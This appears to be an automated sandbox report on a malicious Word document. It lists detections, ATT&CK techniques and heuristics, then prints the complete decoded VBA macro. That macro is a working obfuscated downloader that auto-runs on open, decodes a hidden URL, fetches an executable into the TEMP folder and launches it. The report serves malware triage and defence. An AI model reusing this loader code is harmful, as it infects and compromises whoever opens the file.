MALICIOUS
Risk Score: 334
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains heavily obfuscated VBA macros, including AutoOpen and Auto_Open functions, designed to execute arbitrary code. Critical heuristics indicate potential shell calls and the use of CreateObject, suggesting the macro's intent is to download and execute a second-stage payload. The presence of the email address 'facepa1m@live.ru' within the document body suggests a potential phishing lure.
Heuristics (12)
- ClamAV: Doc.Downloader.Generic-6698421-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
- VBA macros detected (medium, OLE_VBA_MACROS, 8 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script:
  AMFWHTUYDGU = Shell(TAYOMJZUJZZ, 1)
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script:
  Set NNIGOCVDPLT = CreateObject(StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("534D")) + "XML2.XMLHTT" + "P")
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script:
  Set NNIGOCVDPLT = CreateObject(StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("534D")) + "XML2.XMLHTT" + "P")
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script:
  Sub AutoOpen()
- Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched line in script:
  Sub Workbook_Open()
- Auto_Open macro (low, OLE_VBA_AUTO). Matched line in script:
  Sub Auto_Open()
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script:
  RYLOPYULCVL StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6578652E312F736A2F6D6F632E73797373766A2F2F3A70747468")), Environ("TEMP") & "\ZDDVXCJSDDG.exe"
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16428 bytes |

SHA-256: 856e4c644834332e9e1dee5220cb0e76147b5d172630154e61f6624fd4a8eb44

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 94 of 181 identifiers look randomly generated (e.g. 'A7871686E646C6B6F617467716D746C7971666C6'), consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
GoTo ibrsmldpiphvsvwtvyuuximekdmojyu
Dim ijxwelbngrcwemofxtwsdvvljohusij As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("776A67666C61737A6F6A74676965676A7569646F6E6F626F6B67637670776A")) For Binary As #8624
Put #8624, , ijxwelbngrcwemofxtwsdvvljohusij
Close #8624
ibrsmldpiphvsvwtvyuuximekdmojyu:
GoTo murzwtryocwwumtzpfxbwmxihpwuqqf
Dim ndsvuypscucexedgfdqdkstaacybklq As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6D696E756473766E6F6E757A6C726669656978736B6C76666D6E796F776273")) For Binary As #57666
Put #57666, , ndsvuypscucexedgfdqdkstaacybklq
Close #57666
murzwtryocwwumtzpfxbwmxihpwuqqf:
GoTo vhhzkdybkmwajfdpgxnvpwohkahzybc
Dim cvdugfhoapuijmmbdpkxglgsmoleyzo As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("62796D7A7869727367776D666A787071747A66697362676C6F637875696169")) For Binary As #92375
Put #92375, , cvdugfhoapuijmmbdpkxglgsmoleyzo
Close #92375
vhhzkdybkmwajfdpgxnvpwohkahzybc:
LEHSCRUYAOP
End Sub
Sub AutoOpen()
GoTo vjtgddkgwyjyxfwyejhjwunmusyqkpe
Dim rouegrbtflfuxsrebbukbwepgrszrwn As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("636F6F6D7671776777707A69787766767373696D796178736470786B667A7A")) For Binary As #45941
Put #45941, , rouegrbtflfuxsrebbukbwepgrszrwn
Close #45941
vjtgddkgwyjyxfwyejhjwunmusyqkpe:
GoTo ydpypmjvhtaujgzwjhvouijzmcvqzsd
Dim rziwiabonhhgkaiygfhisyzuorasxbn As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("65656565637A6E6E747774786D6278746968626767656F677A61647975636D")) For Binary As #65273
Put #65273, , rziwiabonhhgkaiygfhisyzuorasxbn
Close #65273
ydpypmjvhtaujgzwjhvouijzmcvqzsd:
GoTo spyufbgiichhxxetjeljbgehetpcpnj
Dim wasssygzauujydnbpxyfsxzkxjukfqa As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("72716666616468696C6A61616364677068716177776A63696F6167646C6B65")) For Binary As #42344
Put #42344, , wasssygzauujydnbpxyfsxzkxjukfqa
Close #42344
spyufbgiichhxxetjeljbgehetpcpnj:
Auto_Open
End Sub
Sub Workbook_Open()
GoTo kfhulilxxrlwhwfixhhvpioommyolqt
Dim vahdtdgblgyapwfvzzbgnsucganhczc As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("676262736464736D6D7479626B67636476716E7478716A74636574676D6461")) For Binary As #44864
Put #44864, , vahdtdgblgyapwfvzzbgnsucganhczc
Close #44864
kfhulilxxrlwhwfixhhvpioommyolqt:
GoTo bnnlkizctdcsqamhtszztldjcrnfalh
Dim tqailmqfkvpdlnadmofxsgunwbrthap As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("76616F636964777A716A746D6776686D73716D72757574746E797869617165")) For Binary As #45511
Put #45511, , tqailmqfkvpdlnadmofxsgunwbrthap
Close #45511
bnnlkizctdcsqamhtszztldjcrnfalh:
GoTo rzyzsruripsusweqdwfixdmwpmptcrn
Dim rfcftrwpgtofwtzmswndflvkoybeiyy As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6E6E6D7A6E616A696B776F707068776F6B627A657169646D75716C73777573")) For Binary As #43709
Put #43709, , rfcftrwpgtofwtzmswndflvkoybeiyy
Close #43709
rzyzsruripsusweqdwfixdmwpmptcrn:
Auto_Open
End Sub
Function RYLOPYULCVL(ByVal DSTVHKMVLII As String, ByVal TAYOMJZUJZZ As String) As Boolean
Dim NNIGOCVDPLT As Object, NSSEPFVGSEO As Long, JELQAMLLIMM As Long, EEGMAWJZHTW() As Byte
GoTo gblmtxdykfjfnyhycuhyvwfnblizyhc
Dim etenctnjvvghquqrjcmnfpanmfemhwx As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("796C786F7976636875696776786D61667065786463746F626E666170786F6C")) For Binary As #94304
Put #94304, , etenctnjvvghquqrjcmnfpanmfemhwx
Close #94304
gblmtxdykfjfnyhycuhyvwfnblizyhc:
GoTo algoxrqkurpvrjhsmitxneerxocebwr
Dim oubhfcyqzjxwizngnlfdbwfpttwemgw As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("696D777A637261706472706564777969727472776B65766161747068657A72")) For Binary As #68449
Put #68449, , oubhfcyqzjxwizngnlfdbwfpttwemgw
Close #68449
algoxrqkurpvrjhsmitxneerxocebwr:
GoTo auwdcnhqqljcqqlyiwpbfraejhdsenf
Dim ndahamwvtdobycbmdqkdayzcskjqqbq As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("70657A6D656866776470706E6564736E7875787469636E666B736663626177")) For Binary As #60306
Put #60306, , ndahamwvtdobycbmdqkdayzcskjqqbq
Close #60306
auwdcnhqqljcqqlyiwpbfraejhdsenf:
Set NNIGOCVDPLT = CreateObject(StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("534D")) + "XML2.XMLHTT" + "P")
GoTo ybokqwyznhamrculzezmyxwgnllkdrs
Dim geskfxulknpykdnaosbxirplqjxswsg As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("7A7871686E646C6B6F617467716D746C7971666C61667778797578616F7263")) For Binary As #45311
Put #45311, , geskfxulknpykdnaosbxirplqjxswsg
Close #45311
ybokqwyznhamrculzezmyxwgnllkdrs:
GoTo demzkwijxqxzqomgljbzsnuronduwys
Dim eprhhdiwffgxfmttxudigyvtaoasvmx As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("7470646D7863676A6A78787167756A636A6F716E7263796474766765686267")) For Binary As #43044
Put #43044, , eprhhdiwffgxfmttxudigyvtaoasvmx
Close #43044
demzkwijxqxzqomgljbzsnuronduwys:
GoTo ewrintjkqejgdjqyslrujarhwichvlx
Dim pvkcujoolhwzonhpmiehmruziboswof As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("7879706D676B6B6B7A706878697A6477776C706A6477766470626573747679")) For Binary As #3259
Put #3259, , pvkcujoolhwzonhpmiehmruziboswof
Close #3259
ewrintjkqejgdjqyslrujarhwichvlx:
NNIGOCVDPLT.Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("544547")), DSTVHKMVLII, False
GoTo cuxtufdwnlvdgjpgwjappxcvyizkdxs
Dim xfwixglnddkfqpkucgubivyhqpbuapk As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("777967667A716F65646A6F62626863647073787878786E7163627366636679")) For Binary As #23644
Put #23644, , xfwixglnddkfqpkucgubivyhqpbuapk
Close #23644
cuxtufdwnlvdgjpgwjappxcvyizkdxs:
GoTo mcxxmyuxzhdbopxreudavtfcuzmzcqz
Dim nhsgrywskmzrscddqubegpspylgoiwq As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6C6A746577756F676877726475757069717A73706B6863686E717766717369")) For Binary As #81586
Put #81586, , nhsgrywskmzrscddqubegpspylgoiwq
Close #81586
mcxxmyuxzhdbopxreudavtfcuzmzcqz:
GoTo pmkfrhqoxulznkgihfmyvgfegwkczzf
Dim qqlwtumayqhcngjtixquqaigzcchnei As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6B6E62716A776A6B787975647A75766571786D686673757A78746B6465796E")) For Binary As #86334
Put #86334, , qqlwtumayqhcngjtixquqaigzcchnei
Close #86334
pmkfrhqoxulznkgihfmyvgfegwkczzf:
NNIGOCVDPLT.Send "send request"
GoTo mszwztmxpannjexlvifpivjjpxjkttz
Dim kryiwjwgixdtcfuecndllllzbsdfdcf As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("70786C7A666879626C7264796D6B626A6D7670737662786C626963676E6277")) For Binary As #48865
Put #48865, , kryiwjwgixdtcfuecndllllzbsdfdcf
Close #48865
mszwztmxpannjexlvifpivjjpxjkttz:
GoTo cwcbcfpemtssitplnhmanezreurzwia
Dim rcbhvrlxzknduwxjwcqsrkjgsaafukt As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("62646B68646B7A6E6973737A6E6E696F65756274716D67707A64786F79646C")) For Binary As #66681
Put #66681, , rcbhvrlxzknduwxjwcqsrkjgsaafukt
Close #66681
cwcbcfpemtssitplnhmanezreurzwia:
Do While NNIGOCVDPLT.readyState <> 4
GoTo qvwvdutdgquzyqkbyhxcnuniajoqhau
Dim iljszkbtdfzkgsfsrtzeosaghtthzqn As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("7378746D6B6C716D757A6F716B68757865756963726C656B676C626E797466")) For Binary As #60416
Put #60416, , iljszkbtdfzkgsfsrtzeosaghtthzqn
Close #60416
qvwvdutdgquzyqkbyhxcnuniajoqhau:
GoTo wjslwfcbkbyvlednhyocdiuvvxgqxns
Dim lzoeugseeimbtbplitjampkjovlopbk As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6C787862706B6E736F61796F6B7A696E6B756375756B76796169656A6A6771")) For Binary As #63024
Put #63024, , lzoeugseeimbtbplitjampkjovlopbk
Close #63024
wjslwfcbkbyvlednhyocdiuvvxgqxns:
GoTo kdypjoldwojbtsryvfnntfwzzrjtzdd
Dim tvawleusyqmrzrbkxqrsqkfjpcafthi As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6363756F66687469626F7867706A66776366777A64796B7A6E6B6F636E6167")) For Binary As #24735
Put #24735, , tvawleusyqmrzrbkxqrsqkfjpcafthi
Close #24735
kdypjoldwojbtsryvfnntfwzzrjtzdd:
DoEvents
GoTo iehqukurutolewdmpakxyzyvzagmdem
Dim kckioohclkyqwkgvfoocsusuqeoqkfr As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("7567707177776C6D697561707764716371646278746E676E6A6D706D726A72")) For Binary As #44320
Put #44320, , kckioohclkyqwkgvfoocsusuqeoqkfr
Close #44320
iehqukurutolewdmpakxyzyvzagmdem:
GoTo yzegjneiipwavdezkhsjkwqvakoenmr
Dim glxhalrjmrsuoqcejchaqfisrjghhuy As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("76796E6B6E7A6F69636275797673646B6D687A71626F74766163637A6E6567")) For Binary As #64472
Put #64472, , glxhalrjmrsuoqcejchaqfisrjghhuy
Close #64472
yzegjneiipwavdezkhsjkwqvakoenmr:
GoTo vbjxidrncximwsfntjwcsqsdirlerox
Dim eunyfrncxtddsocwnxllpbgznmxubft As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("687666747967647279666C646578656F74776C6877676874766A6478697867")) For Binary As #34647
Put #34647, , eunyfrncxtddsocwnxllpbgznmxubft
Close #34647
vbjxidrncximwsfntjwcsqsdirlerox:
Loop
GoTo reucwrttgtkyjlruevyufsqksechxjb
Dim fvodecfvnkguhhyrbrmiobvmovlumnw As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6B686763667A62726368746D676D66626668736D756D75656C64736E6A6E71")) For Binary As #62517
Put #62517, , fvodecfvnkguhhyrbrmiobvmovlumnw
Close #62517
reucwrttgtkyjlruevyufsqksechxjb:
GoTo hgrrkksmwrkdvmtizvejxjcuuohcdom
Dim fcwlhqpzfhrovcwcoxxhjhqwklltfyx As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("63796C737668647270796E73686E6B7A6C636469776564626C6171636B6F61")) For Binary As #67641
Put #67641, , fcwlhqpzfhrovcwcoxxhjhqwklltfyx
Close #67641
hgrrkksmwrkdvmtizvejxjcuuohcdom:
GoTo pnijwjwmexjjhntyjspuiovtnbmogrz
Dim kilabocvwrplvuhapiifkhmgjwecume As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6E76756D6B72706E7A7A78716770677A6B797265656A69616277657A777273")) For Binary As #97559
Put #97559, , kilabocvwrplvuhapiifkhmgjwecume
Close #97559
pnijwjwmexjjhntyjspuiovtnbmogrz:
EEGMAWJZHTW = NNIGOCVDPLT.responseBody
GoTo lrmkgiwuxtncahvjhovwzqgpwvrersc
Dim nbsyjaabykcvadnfiljwjhowmkacizl As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6D6B756D65766574637A726E696676737370646A7A6D7569766E616A676474")) For Binary As #46976
Put #46976, , nbsyjaabykcvadnfiljwjhowmkacizl
Close #46976
lrmkgiwuxtncahvjhovwzqgpwvrersc:
GoTo gosurlkryjpfsedsgcaeplynexqfaih
Dim faqnmqdpdalpeywofccbayecwqyscpc As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("727677656E66707469776771656C72637771746D726769786F756973717765")) For Binary As #74704
Put #74704, , faqnmqdpdalpeywofccbayecwqyscpc
Close #74704
gosurlkryjpfsedsgcaeplynexqfaih:
GoTo tnaphekasxbracbhabmwjmonjlibvko
Dim doproczbmrquoruieennbtxuycdsjxq As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("756D736675756A6D7A6B7A6C6F636E62686172707568696A656A71616C6968")) For Binary As #9363
Put #9363, , doproczbmrquoruieennbtxuycdsjxq
Close #9363
tnaphekasxbracbhabmwjmonjlibvko:
JELQAMLLIMM = FreeFile
GoTo wqczbykyaihoqbptdjhisthkgftskdq
Dim qpddwudcywchzmmfsjadwzdgfppmdfm As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("657265756877706E6F626573736377707173677277756271637A6970727870")) For Binary As #53143
Put #53143, , qpddwudcywchzmmfsjadwzdgfppmdfm
Close #53143
wqczbykyaihoqbptdjhisthkgftskdq:
GoTo yapjcmybpddymczraoqlpnpseljuwmd
Dim gwxtblghrvminpxqelzqjxgzazxmyou As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("68687466686C7476716C65626666706B626C61616279746D6D6A6F6862757A")) For Binary As #47397
Put #47397, , gwxtblghrvminpxqelzqjxgzazxmyou
Close #47397
yapjcmybpddymczraoqlpnpseljuwmd:
GoTo iotwhlpzobqctfwowrybakbsgdzfywu
Dim yqekfwqtwiywymlvqwbvrhwvvpvcujw As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6E786A686F6D666A677362616F676D636C6768657463666168777965657773")) For Binary As #91745
Put #91745, , yqekfwqtwiywymlvqwbvrhwvvpvcujw
Close #91745
iotwhlpzobqctfwowrybakbsgdzfywu:
If Dir(TAYOMJZUJZZ) <> StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("")) Then Kill TAYOMJZUJZZ
Open TAYOMJZUJZZ For Binary As #JELQAMLLIMM
Put #JELQAMLLIMM, , EEGMAWJZHTW
Close #JELQAMLLIMM
GoTo vxjrzdxnqwpmfofakpbrgotwdmpofux
Dim gjdoqxhqlfvtzqmghavdvfinkjytobf As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("73796A74776E706379667A7476636C6C6967796161716575697A64647A676F")) For Binary As #30762
Put #30762, , gjdoqxhqlfvtzqmghavdvfinkjytobf
Close #30762
vxjrzdxnqwpmfofakpbrgotwdmpofux:
GoTo rabrjsabaubpqxnkburptddzdyuhjby
Dim rhvdaswbmwzpbtbflitwkrgggycznsy As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("797A7068767778777166657676707371767361696D6161646A6F6971766F6C")) For Binary As #34181
Put #34181, , rhvdaswbmwzpbtbflitwkrgggycznsy
Close #34181
rabrjsabaubpqxnkburptddzdyuhjby:
GoTo seuirbdohiegmorzubxhjfcfxmctiph
Dim axvambbbzwdplxzwybuouqpmzyseexv As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("63756C686A7676727673766B6B76626E7370716D69696C647770626D676970")) For Binary As #51651
Put #51651, , axvambbbzwdplxzwybuouqpmzyseexv
Close #51651
seuirbdohiegmorzubxhjfcfxmctiph:
Dim AMFWHTUYDGU
GoTo siykjbrigwkhtweusncbatbtbadslvj
Dim qdqrvubsfgezddkzmjxtpmasdknbbgu As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("686767746D727A676D667278707964796F63616C6A6C6A67716D6C61787272")) For Binary As #14433
Put #14433, , qdqrvubsfgezddkzmjxtpmasdknbbgu
Close #14433
siykjbrigwkhtweusncbatbtbadslvj:
GoTo zrzovzwlmqsjmexecbrlhyhkkxesxhb
Dim dxjfxewrlfekpzkxkjohqgrqitlthio As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("76766D6B71736B716B767A6B66637A66646965657878797979796161736665")) For Binary As #54969
Put #54969, , dxjfxewrlfekpzkxkjohqgrqitlthio
Close #54969
zrzovzwlmqsjmexecbrlhyhkkxesxhb:
GoTo jjbempzqaiswlwxqqdpodmhjiahbvmo
Dim hugcrpyuywonptsmkdtfwhdduuecosl As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6D686A68637162636B73757566756966736C636A6379646F676E6662676D74")) For Binary As #6392
Put #6392, , hugcrpyuywonptsmkdtfwhdduuecosl
Close #6392
jjbempzqaiswlwxqqdpodmhjiahbvmo:
AMFWHTUYDGU = Shell(TAYOMJZUJZZ, 1)
GoTo qadpifenldzcxpfdxtifljrrzzbcsxa
Dim aegmorsksvivzugmhgafcdmglgehjrt As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6E686D756D6F6471796E62677673656C6F72676A6D75627273776167696C69")) For Binary As #79239
Put #79239, , aegmorsksvivzugmhgafcdmglgehjrt
Close #79239
qadpifenldzcxpfdxtifljrrzzbcsxa:
GoTo esgjrteacoiipfdndlofnculesukskf
Dim ocintjpmmqljnytisygjzmlcwwqbcwp As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("677A677463646D75626678686A66776A626F77726E756B7465657A79616261")) For Binary As #65457
Put #65457, , ocintjpmmqljnytisygjzmlcwwqbcwp
Close #65457
esgjrteacoiipfdndlofnculesukskf:
Set NNIGOCVDPLT = Nothing
GoTo eunyfrncxtddsocwnxllpbgznmxubft
Dim damvgvyfykmfsyvkwezqjzortwkmsca As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6579787163626B6968756C77796C6969716565726C6D716C747A7461726270")) For Binary As #90707
Put #90707, , damvgvyfykmfsyvkwezqjzortwkmsca
Close #90707
eunyfrncxtddsocwnxllpbgznmxubft:
GoTo idtllvxvbahecjyyqkpkcrcsliyzbfi
Dim nyltnuhkvzqaenqpkupbtnnutbwuerm As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("64626A71676F6F7774697463686C77656F726274646E677372756665697A77")) For Binary As #91592
Put #91592, , nyltnuhkvzqaenqpkupbtnnutbwuerm
Close #91592
idtllvxvbahecjyyqkpkcrcsliyzbfi:
GoTo odnmfkcjazszslcqzarqhtomxrnskql
Dim mweesncwwywxcilphqohqfnsfgctpxd As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("736A6A746D6973646666757875736F72747A766E676A656264737663696577")) For Binary As #46976
Put #46976, , mweesncwwywxcilphqohqfnsfgctpxd
Close #46976
odnmfkcjazszslcqzarqhtomxrnskql:
End Function
Sub LEHSCRUYAOP()
RYLOPYULCVL StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6578652E312F736A2F6D6F632E73797373766A2F2F3A70747468")), Environ("TEMP") & "\ZDDVXCJSDDG.exe"
End Sub
Public Function podiykbwptwurwktgjtmxbhmqedkhno(ByVal jhgfddfghfukdfg As String) As String
Dim pgnfsrhgrherth As Long
For pgnfsrhgrherth = 1 To Len(jhgfddfghfukdfg) Step 2
podiykbwptwurwktgjtmxbhmqedkhno = podiykbwptwurwktgjtmxbhmqedkhno & Chr$(Val("&H" & Mid$(jhgfddfghfukdfg, pgnfsrhgrherth, 2)))
Next pgnfsrhgrherth
End Function